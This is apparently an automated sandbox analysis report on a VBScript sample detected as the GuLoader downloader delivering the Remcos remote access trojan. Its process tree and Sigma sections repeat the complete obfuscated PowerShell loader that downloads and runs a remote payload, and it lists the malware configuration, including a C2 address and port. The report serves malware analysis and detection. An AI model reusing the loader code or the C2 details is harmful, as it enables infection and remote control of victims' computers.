Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Strait STS.vbs

Overview

General Information

Sample name:Strait STS.vbs
Analysis ID:1573519
MD5:e6c71bbe4f758fb7c79ac21e9c514977
SHA1:8a491650c20b51b8ccaeb4d76464b01ab1f15ef7
SHA256:96e58c4ebcebd2972a1f50671fe2c43a89caa4c078767952ddcade51985d4a3f
Tags:GuLoadervbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 880 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis .cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7452 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis .cockCErhvo hronRav,v AdveDetor IsotFeed]Squa: His:Hos.FturtrKe.no ommCephBF elaSprnstodaeCadu6Sekh4StvkSV.cutScarrFr,tiPartn oligKrko( Sub$ CupYEs,an T,ddC,arl O,siM linKl ngMisasMegao .omfAbstfFej eS,ovr b g)');Nonprecipitation225 (Exposes 'Bskt$.risGEfteLSubpODaviBMedeAConil,ovi: kovT Ar.a KarlOwlgNNaziEBastTUdviTUfore MowNPlanEMeni Skil= Lac For[geomsAcroYSoljS nmetLu eE Be mKont. esttTilse ennXBobltL se.Konse SygnForfCLsbaoBde DGraiIVmmenC utGFico] la:Phot:TaleAPyrrS rocPaa IBundIUros. .ylgEmpuE Un tUn.ss CenTski rBesgII.den rosG Pee(Gn v$S lfEKhutKKnogsSupppKapioN.ncrFyldT VetV ad rPrisdJernI Teu)');Nonprecipitation225 (Exposes 'Dete$Ex agUnd LtimeoDr kbInglAundelFre,:SexiT NonrUdmaA T lMDiaePGl uAD smgSiddE Syn= Kvl$Mic.tGrasAReadLBootNCaboEBranTsanstStyreoplsnSillEMell.F.thSSulpu F,rbGermS nitTFjelRDistIVrign R kgMon (A sk$UlmorInapAsem,d,phaiMonoaPre TPe soUnexr Amuy ain,Outt$i juHAftauStilp BarpCa,raMundHCyclsTnde1B.dr7 Und6Hema)');Nonprecipitation225 $Trampage;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7768 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["154.216.18.216:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7K8JAD", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1610779678.0000000008EC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000A.00000002.1612779996.000000000971E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000A.00000002.1593326524.000000000616F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_2356.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7452.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc499:$b2: ::FromBase64String(
              • 0xb511:$s1: -join
              • 0x4cbd:$s4: +=
              • 0x4d7f:$s4: +=
              • 0x8fa6:$s4: +=
              • 0xb0c3:$s4: +=
              • 0xb3ad:$s4: +=
              • 0xb4f3:$s4: +=
              • 0x15a87:$s4: +=
              • 0x15b07:$s4: +=
              • 0x15bcd:$s4: +=
              • 0x15c4d:$s4: +=
              • 0x15e23:$s4: +=
              • 0x15ea7:$s4: +=
              • 0xbd3d:$e4: Get-WmiObject
              • 0xbf2c:$e4: Get-Process
              • 0xbf84:$e4: Start-Process
              • 0x166fd:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", ProcessId: 880, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.216.143, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7768, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49776
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs", ProcessId: 880, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefra

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: F6 D9 F9 01 8F BC 7D 88 8A C0 4F 4E 28 1D 60 D6 04 B7 A4 2D C8 1F 38 A3 F2 36 66 57 7D 18 72 E2 E9 6B B9 93 04 47 D0 F2 62 EA 6E 13 DD 23 D4 5F 7D 4A C0 D4 C3 79 F4 AE 21 C3 40 A0 FF DA AD D9 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-7K8JAD\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:54:02.268298+010020365941Malware Command and Control Activity Detected192.168.2.749946154.216.18.2162404TCP
